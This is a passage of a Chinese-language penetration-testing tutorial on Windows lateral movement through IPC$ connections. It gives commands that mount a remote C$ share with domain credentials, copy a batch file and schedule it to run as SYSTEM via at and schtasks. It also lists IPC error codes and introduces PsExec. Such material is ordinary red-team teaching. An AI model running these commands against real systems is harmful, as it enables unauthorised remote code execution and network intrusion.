                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.5pt;">&nbsp;</span>
                </p>
                <h4 style="margin-top:.05pt;punctuation-wrap:simple;tab-stops:48.15pt;">
                        <a name="4.2.1.1 IPC利用条件"></a><span lang="EN-US" style="letter-spacing:-.1pt;"><span>4.2.1.1<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span lang="EN-US">IPC<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">利用条件<span lang="EN-US"></span></span>
                </h4>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:13.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <span lang="EN-US">1</span>、<span lang="EN-US">139 </span>或<span lang="EN-US"> 445 </span>端口开启<span lang="EN-US">:ipc </span>连接可以实现远程登录及对默认共享的访问;而<span lang="EN-US"> 139 </span>端口的开启表示<span lang="EN-US">netbios </span>协议的应用,我们可以通过<span lang="EN-US"> 139</span>、<span lang="EN-US">445 </span>端口实现对共享文件<span lang="EN-US">/</span>打印机的访问<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;line-height:98%;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection17;">
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:6.0pt;margin-right:10.8pt;margin-top:2.15pt;punctuation-wrap:simple;text-autospace:none;text-indent:20.95pt;">
                        <span lang="EN-US">2</span>、管理员开启了默认共享:默认共享是为了方便管理员远程管理而默认开启的共享, 即所有的逻辑盘(<span lang="EN-US">C$</span>、<span lang="EN-US">d$</span>、<span lang="EN-US">e$...</span>)和系统目录<span lang="EN-US"> winnt </span>或者<span lang="EN-US">windows</span>(<span lang="EN-US">admin$</span>)<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.15pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:12.5pt;">&nbsp;</span>
                </p>
                <h4 style="margin-left:51.25pt;punctuation-wrap:simple;tab-stops:51.3pt;text-indent:-45.3pt;">
                        <a name="4.2.1.2 建立IPC连接、copy文件、创建计划任务"></a><span lang="EN-US" style="letter-spacing:-.1pt;"><span>4.2.1.2<span style="font:7.0pt &quot;">&nbsp;&nbsp;&nbsp; </span></span></span><span style="letter-spacing:1.7pt;">建立</span><span lang="EN-US">IPC<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">连接、</span><span lang="EN-US">copy<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">文件、创建计划任务<span lang="EN-US"></span></span>
                </h4>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:12.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:.0001pt;margin-left:27.0pt;margin-right:150.5pt;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">net user <u><span style="color:blue;">\\192.168.19.169\c$</span></u><span style="color:blue;"> </span><span style="color:black;">test@123 /user:adtest\jeff1 copy 1.bat </span><u><span style="color:blue;">\\192.168.19.169\c$</span></u><span style="color:blue;"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.7pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:8.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:.0001pt;margin-left:27.0pt;margin-right:0cm;margin-top:2.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">net time <u><span style="color:blue;">\\192.168.19.169</span></u><span style="color:blue;"></span></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:27.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">at \\192.168.19.169 1:03 c:\1.bat</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1037" style="position:absolute;margin-left:90pt;margin-top:7.1pt;width:414pt;height:203pt;z-index:251669504;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:203.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1069" type="#_x0000_t75" style="width:414.5pt;height:203.5pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image055.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="555" height="273" src="https://www.2k8.org/content/uploadfile/202203/17/8e0ce59a.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:3.0pt;"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:7.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:14.0pt;">schtasks</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:5.0pt;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1038" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:22.25pt;width:417pt;height:122pt;z-index:251670528;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:122.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1070" type="#_x0000_t75" style="width:416.8pt;height:121.85pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image057.png" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="559" height="165" src="https://www.2k8.org/content/uploadfile/202203/17/65c80783.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
由于<span lang="EN-US"> at </span>在新版本的系统中已被弃用,我们需要用<span lang="EN-US">schtasks </span>替代<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.4pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        <span lang="EN-US">schtasks /create /s 192.168.19.177 /u adtest\jeff1 /p test@123 /ru "SYSTEM" /tn test /sc DAILY</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        <span lang="EN-US">/tr c:\1.bat /F</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <span style="letter-spacing:-.15pt;">创建计划任务,</span><span lang="EN-US" style="letter-spacing:-.45pt;">/s</span><span lang="EN-US" style="letter-spacing:-.15pt;"> </span><span style="letter-spacing:-.15pt;">指定远程机器名或 </span><span lang="EN-US">ip<span style="letter-spacing:-.05pt;"> </span></span><span style="letter-spacing:-.05pt;">地址,</span><span lang="EN-US" style="letter-spacing:-.35pt;">/ru</span><span lang="EN-US" style="letter-spacing:-.25pt;"> </span><span style="letter-spacing:-.25pt;">指定运行任务的用户权限,这里指定</span><span style="letter-spacing:-.15pt;">为最高的 </span><span lang="EN-US">SYSTEM</span>,<span lang="EN-US">/tn<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">是任务名称,</span><span lang="EN-US">/sc<span style="letter-spacing:-.25pt;"> </span></span><span style="letter-spacing:-.25pt;">是任务运行频率,这里指定为每天运行,并没什么</span><span style="letter-spacing:-.2pt;">实际意义,</span><span lang="EN-US">/tr </span>指定运行的文件,<span lang="EN-US">/F<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">表示如果指定的任务已经存在,则强制创建任务并抑制警告<span lang="EN-US"></span></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;letter-spacing:-.15pt;line-height:98%;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection18;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="551" height="401" src="https://www.2k8.org/content/uploadfile/202203/17/408e7330.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.55pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:6.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:5.1pt;punctuation-wrap:simple;text-autospace:none;">
                        <span style="color:#333333;">运行任务,其中</span><span lang="EN-US" style="color:#333333;font-family:Comic Sans MS;">/i </span><span style="color:#333333;">表示<b>立即运行<span lang="EN-US"></span></b></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:7.0pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1039" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:28.25pt;width:415pt;height:50pt;z-index:251671552;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:50.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1071" type="#_x0000_t75" style="width:414.5pt;height:50.5pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image061.jpg" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="556" height="69" src="https://www.2k8.org/content/uploadfile/202203/17/83f70c18.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">schtasks /run /s 192.168.19.177 /u adtest\jeff1 /p test@123 /tn test /i</span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection19;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="553" height="357" src="https://www.2k8.org/content/uploadfile/202203/17/fde1c550.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.2pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:13.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.6pt;punctuation-wrap:simple;text-autospace:none;">
                        删除计划任务<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">schtasks /delete /s 192.168.19.177 /u adtest\jeff1 /p test@123 /tn test /f</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="553" height="454" src="https://www.2k8.org/content/uploadfile/202203/17/c3e3a6d9.png" alt="" style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:9.0pt;"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:9.0pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection20;">
                <h4 style="margin-top:1.2pt;punctuation-wrap:simple;tab-stops:48.15pt;">
                        <a name="4.2.1.3 IPC常见错误"></a><span lang="EN-US" style="letter-spacing:-.1pt;"><span>4.2.1.3<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span lang="EN-US">IPC<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">常见错误<span lang="EN-US"></span></span>
                </h4>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.05pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:13.0pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:60.7pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        错误号<span lang="EN-US"> 5</span>,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限; 错误号<span lang="EN-US"> 51</span>,<span lang="EN-US">Windows </span>无法找到网络路径<span lang="EN-US"> : </span>网络有问题;<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span style="letter-spacing:-.1pt;">错误号 </span><span lang="EN-US" style="letter-spacing:-1.0pt;">53</span><span style="letter-spacing:-.3pt;">,找不到网络路径<span lang="EN-US"><span>&nbsp; </span></span>: </span><span lang="EN-US">ip<span style="letter-spacing:-.65pt;"> </span></span><span style="letter-spacing:-.65pt;">地址错误;目标未开机;目标 </span><span lang="EN-US">lanmanserver<span style="letter-spacing:-.15pt;"> </span></span><span style="letter-spacing:-.15pt;">服务未启动; 目标有防火墙(端口过滤</span><span style="letter-spacing:-5.4pt;">)</span>;<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        错误号<span lang="EN-US"> 67</span>,找不到网络名 : 你的<span lang="EN-US"> lanmanworkstation </span>服务未启动;目标删除了<span lang="EN-US"> ipc$</span>; 错误号<span lang="EN-US"> 1219</span>,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个<span lang="EN-US"> ipc$</span>,请删除再连。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.45pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        错误号<span lang="EN-US"> 1326</span>,未知的用户名或错误密码:原因很明显了;<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.65pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        <span style="letter-spacing:-.05pt;">错误号 </span><span lang="EN-US">1792</span><span style="letter-spacing:-.25pt;">,试图登录,但是网络登录服务没有启动:目标 </span><span lang="EN-US">NetLogon<span style="letter-spacing:-.9pt;"> </span></span><span style="letter-spacing:-.9pt;">服务未启动。</span><span style="letter-spacing:-.15pt;">(</span>连接<span style="letter-spacing:-.15pt;">域控会出现此情况</span>)<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.6pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-justify:inter-ideograph;">
                        错误号<span lang="EN-US"> 2242</span>,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.65pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:12.0pt;">&nbsp;</span>
                </p>
                <h4 style="punctuation-wrap:simple;tab-stops:48.15pt;">
                        <a name="4.2.1.4 PsTools"></a><span lang="EN-US" style="letter-spacing:-.1pt;"><span>4.2.1.4<span style="font:7.0pt &quot;">&nbsp;&nbsp; </span></span></span><span lang="EN-US">PsTools</span>
                </h4>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.7pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-family:等线 Light;font-size:12.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:98%;margin-bottom:0cm;margin-left:6.0pt;margin-right:10.55pt;margin-top:0cm;punctuation-wrap:simple;text-align:justify;text-autospace:none;text-indent:20.95pt;text-justify:inter-ideograph;">
                        <span lang="EN-US">PsTools </span>是<span lang="EN-US"> sysinternals </span>开发的一个功能强大的安全管理工具包,最新版目前共有<span lang="EN-US"> 13 </span>个各种功能的小工具。这里介绍下<span lang="EN-US"> psexec</span>,<span lang="EN-US">psexec </span>是一款远程执行命令的工具,在内网渗透的时候常它来进行横向移动。<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.55pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        下载地址:<span lang="EN-US"><a href="https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec"><span style="color:blue;">https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec</span></a><span style="color:blue;"></span></span>
                </p>
        </div>
<span lang="EN-US" style="color:blue;font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection21;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="553" height="507" src="https://www.2k8.org/content/uploadfile/202203/17/17ae5694.png" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:0cm;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:13.5pt;">&nbsp;</span>
                </p>
                <h6 style="line-height:normal;margin-top:2.65pt;punctuation-wrap:simple;">
                        <span lang="EN-US">PsExec</span>
                </h6>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.3pt;punctuation-wrap:simple;text-autospace:none;">
                        <b><span lang="EN-US" style="font-size:10.0pt;">&nbsp;</span></b>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">1</span>、 若已建立<span lang="EN-US"> IPC$</span>连接,无需再次输入账号密码,所有<span lang="EN-US"> pstools </span>工具可直接使用<span lang="EN-US"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1043" style="position:absolute;left:0;text-align:left;margin-left:90pt;margin-top:17.55pt;width:412pt;height:104pt;z-index:251673600;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:104.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1072" type="#_x0000_t75" style="width:412pt;height:104pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image070.jpg" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="552" height="141" src="https://www.2k8.org/content/uploadfile/202203/17/0f83c5af.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US">net use //</span>查看<span lang="EN-US">ipc </span>连接状态<span lang="EN-US"></span>
                </p>
        </div>
<span lang="EN-US" style="font-family:等线;font-size:10.5pt;"><br clear="all" style="page-break-before:always;" />
</span>
        <div style="page:WordSection22;">
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:0cm;punctuation-wrap:simple;text-autospace:none;">
                        <img width="551" height="255" src="https://www.2k8.org/content/uploadfile/202203/17/8fd73548.jpg" alt="" style="vertical-align:middle;" />
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.7pt;punctuation-wrap:simple;text-autospace:none;">
                        <!--><o:wrapblock><v:rect id="_x0000_s1044" style="position:absolute;margin-left:90pt;margin-top:13.25pt;width:417pt;height:191pt;z-index:251674624;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text;" o:allowincell="f" filled="f" stroked="f">   <v:textbox inset="0,0,0,0">    <!>
                        <table cellpadding="0" cellspacing="0" width="100%">
                                <tr>
                                        <td>
                                                <div>
                                                        <p class="MsoNormal" style="line-height:191.0pt;mso-pagination:widow-orphan;mso-layout-grid-align:auto;text-autospace:ideograph-numeric ideograph-other;">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;"><vshape id="_x0000_i1073" type="#_x0000_t75" style="width:416.5pt;height:191pt;">       <vimagedata src="file://C:/Users/86137/AppData/Local/Temp/msohtmlclip1/01/clip_image074.jpg" o:title="" />      </vshape></span>
                                                        </p>
                                                        <p class="MsoNormal">
                                                                <span lang="EN-US" style="font-size:12.0pt;font-family:&quot;mso-fareast-font-family:等线;mso-fareast-theme-font:minor-fareast;">&nbsp;</span>
                                                        </p>
                                                </div>
<!>
                                        </td>
                                </tr>
                        </table>
</v:textbox>   <w:wrap type="topAndBottom" anchorx="page" /></v:rect><!--><span>
                        <table cellpadding="0" cellspacing="0" align="left">
                                <tbody>
                                        <tr>
                                                <td width="180" height="0">
                                                </td>
                                        </tr>
                                        <tr>
                                                <td>
                                                </td>
                                                <td>
                                                        <img width="559" height="257" src="https://www.2k8.org/content/uploadfile/202203/17/f7d63761.png" alt=": " style="vertical-align:middle;" />
                                                </td>
                                        </tr>
                                </tbody>
                        </table>
</span><br clear="ALL" />
<span lang="EN-US" style="font-size:7.0pt;"></span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;margin-bottom:.0001pt;margin-left:0cm;margin-right:0cm;margin-top:.1pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US" style="font-size:11.5pt;">&nbsp;</span>
                </p>
                <p style="font-family:等线;font-size:10.5pt;line-height:15.7pt;margin-bottom:0cm;margin-left:6.0pt;margin-right:0cm;margin-top:2.6pt;punctuation-wrap:simple;text-autospace:none;">
                        <span lang="EN-US">2</span>、 若未建立<span lang="EN-US"> IPC </span>连接,则要使用账号密码进行登录<span lang="EN-US"></span>
                </p>
